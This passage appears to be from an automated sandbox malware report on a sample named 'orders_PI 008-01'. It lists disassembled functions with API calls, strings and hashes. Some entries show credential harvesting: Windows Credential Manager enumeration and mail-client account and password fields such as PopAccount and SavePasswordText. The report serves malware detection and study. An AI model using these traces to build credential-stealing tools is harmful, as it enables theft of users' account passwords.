                                          • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,75570A60), ref: 00408E31
                                          • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
                                        • String ID: 0wE$`Wu$`Wu
                                        • API String ID: 2915808112-506312391
                                        • Opcode ID: ed916fde650882a961c0d1d8ab7e73890c0a1d0683c4cd4983fb3a7ffada175a
                                        • Instruction ID: 1be057752684aea17f507b8882d339e9c418a93e0b7bc1648df0d3b0eb18cc96
                                        • Opcode Fuzzy Hash: ed916fde650882a961c0d1d8ab7e73890c0a1d0683c4cd4983fb3a7ffada175a
                                        • Instruction Fuzzy Hash: B4513B71A01704AFEB24DF29D542B9AB7E4FF88314F10852EE55ADB382DB74E940CB44
                                        Function 004019EA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: free$strlen
                                        • String ID:
                                        • API String ID: 667451143-3916222277
                                        • Opcode ID: 9b31ecf1158dd6ae2a3c8c1c56445d205644741fb05b7f80747d8069a3e6348b
                                        • Instruction ID: 13b3c487e6fc4f201ff2a1b2153655c725249ac645d8b76b05149576827ff0bb
                                        • Opcode Fuzzy Hash: 9b31ecf1158dd6ae2a3c8c1c56445d205644741fb05b7f80747d8069a3e6348b
                                        • Instruction Fuzzy Hash: 1F6189319093869FDB109F25948452BBBF0FB8531AF905D7FF4D2A22A2D738D845CB0A
                                        Function 004086E0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 155COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                        • wcslen.MSVCRT ref: 0040874A
                                        • wcsncmp.MSVCRT ref: 00408794
                                        • memset.MSVCRT ref: 0040882A
                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                        • wcschr.MSVCRT ref: 0040889F
                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                        • String ID: J$Microsoft_WinInet
                                        • API String ID: 3318079752-260894208
                                        • Opcode ID: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                        • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                        • Opcode Fuzzy Hash: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                        • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                        Function 00404A99 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(comctl32.dll,75570A60,?,00000000,?,?,?,0040CF60,75570A60), ref: 00404AB8
                                        • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                        • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,75570A60), ref: 00404ADE
                                        • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadMessageProc
                                        • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                        • API String ID: 2780580303-317687271
                                        • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                        • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                        • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                        • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C
                                        Function 00406C7C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarystringwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00406D9B,?,?), ref: 00406CA1
                                        • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,?,00000000,?,?,00406D9B,?,?), ref: 00406CBF
                                        • strlen.MSVCRT ref: 00406CCC
                                        • _mbscpy.MSVCRT(?,?,?,?,00406D9B,?,?), ref: 00406CDC
                                        • LocalFree.KERNEL32(?,?,?,00406D9B,?,?), ref: 00406CE6
                                        • _mbscpy.MSVCRT(?,Unknown Error,?,?,00406D9B,?,?), ref: 00406CF6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                        • String ID: Unknown Error$netmsg.dll
                                        • API String ID: 2881943006-572158859
                                        • Opcode ID: b7e81aadefcc7b6962b65187ced15e7eab001dc011c9c914f76b8834be414875
                                        • Instruction ID: bcf62a4d61e6eba693f00c41f459c7331aa1a44f371262b110411e5fdf5e0d86
                                        • Opcode Fuzzy Hash: b7e81aadefcc7b6962b65187ced15e7eab001dc011c9c914f76b8834be414875
                                        • Instruction Fuzzy Hash: B201DF31609114BBF7051B61EE46F9FBA6CEF49790F20002AF607B1191DA78AE10969C
                                        Function 0040966C Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                        • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409686
                                        • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409696
                                        • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                          • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: PrivateProfile_mbscpy$AttributesFileString
                                        • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                        • API String ID: 888011440-2039793938
                                        • Opcode ID: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                        • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                        • Opcode Fuzzy Hash: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                        • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                        Function 0042E8E8 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 272COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        • too many attached databases - max %d, xrefs: 0042E951
                                        • cannot ATTACH database within transaction, xrefs: 0042E966
                                        • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                        • database is already attached, xrefs: 0042EA97
                                        • database %s is already in use, xrefs: 0042E9CE
                                        • unable to open database: %s, xrefs: 0042EBD6
                                        • out of memory, xrefs: 0042EBEF
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpymemset
                                        • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                        • API String ID: 1297977491-2001300268
                                        • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                        • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                                        • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                        • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                        Function 00403166 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                        • strchr.MSVCRT ref: 0040327B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: PrivateProfileStringstrchr
                                        • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                        • API String ID: 1348940319-1729847305
                                        • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                        • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                        • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                        • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                        Function 00411004 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                        Download Yara Rule
                                        APIs
                                        • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                        • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                        • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy
                                        • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                        • API String ID: 3510742995-3273207271
                                        • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                        • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                        • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                        • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                        Function 00405E69 Relevance: 13.6, APIs: 9, Instructions: 58windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetClientRect.USER32(?,?), ref: 00405E80
                                        • GetWindow.USER32(?,00000005), ref: 00405E98
                                        • GetWindow.USER32(00000000), ref: 00405E9B
                                          • Part of subcall function 004015B0: GetWindowRect.USER32(?,?), ref: 004015BF
                                          • Part of subcall function 004015B0: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004015DA
                                        • GetWindow.USER32(00000000,00000002), ref: 00405EA7
                                        • GetDlgItem.USER32(?,000003ED), ref: 00405EBE
                                        • GetDlgItem.USER32(?,00000000), ref: 00405ED0
                                        • GetDlgItem.USER32(?,00000000), ref: 00405EE2
                                        • GetDlgItem.USER32(?,000003ED), ref: 00405EF0
                                        • SetFocus.USER32(00000000), ref: 00405EF3
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Window$Item$Rect$ClientFocusPoints
                                        • String ID:
                                        • API String ID: 2432066023-0
                                        • Opcode ID: 3ed905a81be40d412dce536e6719fe7cdedab364c991d1c90f2ea44b29e4445c
                                        • Instruction ID: 6786727c0aa7fef6bca0c81d499308ec00879f235530f9e7c86c655f771e1d73
                                        • Opcode Fuzzy Hash: 3ed905a81be40d412dce536e6719fe7cdedab364c991d1c90f2ea44b29e4445c
                                        • Instruction Fuzzy Hash: B801A571500305EFDB116F76DC8AF6BBFACEF81755F05442AB4049B191CBB8E8018A28
                                        Function 0040F96C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                        • memset.MSVCRT ref: 0040FA1E
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                        • _strnicmp.MSVCRT ref: 0040FA4F
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                        • String ID: WindowsLive:name=*$windowslive:name=
                                        • API String ID: 945165440-3589380929
                                        • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                        • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                        • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                        • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                        Function 004036E5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                          • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                          • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                          • Part of subcall function 00410863: CoTaskMemFree.COMBASE(?), ref: 004108D2
                                        • strchr.MSVCRT ref: 0040371F
                                        • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                        • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                        • strlen.MSVCRT ref: 00403778
                                        • sprintf.MSVCRT ref: 0040379C
                                        • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                        • String ID: %s@gmail.com
                                        • API String ID: 3261640601-4097000612
                                        • Opcode ID: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
                                        • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                        • Opcode Fuzzy Hash: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
                                        • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                        Function 004094A2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 004094C8
                                        • GetDlgCtrlID.USER32(?), ref: 004094D3
                                        • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                        • memset.MSVCRT ref: 0040950C
                                        • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                        • _strcmpi.MSVCRT ref: 00409531
                                          • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                        • String ID: sysdatetimepick32
                                        • API String ID: 3411445237-4169760276
                                        • Opcode ID: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                        • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                        • Opcode Fuzzy Hash: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                        • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                        Function 00405983 Relevance: 12.2, APIs: 8, Instructions: 200windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                                        • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                                        • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                                        • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                                        • EndDialog.USER32(?,00000002), ref: 00405A96
                                        • EndDialog.USER32(?,00000001), ref: 00405AA9
                                          • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                                          • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                                          • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                                        • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                                        • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Item$DialogMessageSend
                                        • String ID:
                                        • API String ID: 2485852401-0
                                        • Opcode ID: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                        • Instruction ID: 49f8b46d81ffaaf96d74304be2fa091063820ac2067ea90d1efd1f4607779086
                                        • Opcode Fuzzy Hash: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                        • Instruction Fuzzy Hash: BC619230600A45ABEB21AF65C8C5A2BB7A5EF40718F04C23BF515A76D1E778EA50CF58
                                        Function 0040B38F Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                        • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                        • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                        • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                        • GetSysColor.USER32(0000000F), ref: 0040B472
                                        • DeleteObject.GDI32(?), ref: 0040B4A6
                                        • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                        • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$DeleteImageLoadObject$Color
                                        • String ID:
                                        • API String ID: 3642520215-0
                                        • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                        • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                        • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                        • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                        Function 00405BD9 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405BE9
                                        • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405C05
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405C2B
                                        • memset.MSVCRT ref: 00405C3B
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405C6A
                                        • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405CB7
                                        • SetFocus.USER32(?,?,?,?), ref: 00405CC0
                                        • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405CD0
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                        • String ID:
                                        • API String ID: 2313361498-0
                                        • Opcode ID: 20fe0494e672a329d8c574fdcc403b16352a75b97cc0102977cb83616af43d0a
                                        • Instruction ID: 76b7db47255e00c5a16d586f34bfaf53fe76d4163934589152c5d70c184cfcdd
                                        • Opcode Fuzzy Hash: 20fe0494e672a329d8c574fdcc403b16352a75b97cc0102977cb83616af43d0a
                                        • Instruction Fuzzy Hash: AF31B3B1500605AFEB24AF69CC85E2AF7A8FF44354B00853FF55AE76A1D778EC408B94
                                        Function 0040BB14 Relevance: 12.1, APIs: 8, Instructions: 76COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetClientRect.USER32(?,?), ref: 0040BB33
                                        • GetWindowRect.USER32(?,?), ref: 0040BB49
                                        • GetWindowRect.USER32(?,?), ref: 0040BB5C
                                        • BeginDeferWindowPos.USER32(00000003), ref: 0040BB79
                                        • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040BB96
                                        • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040BBB6
                                        • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040BBDD
                                        • EndDeferWindowPos.USER32(?), ref: 0040BBE6
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Window$Defer$Rect$BeginClient
                                        • String ID:
                                        • API String ID: 2126104762-0
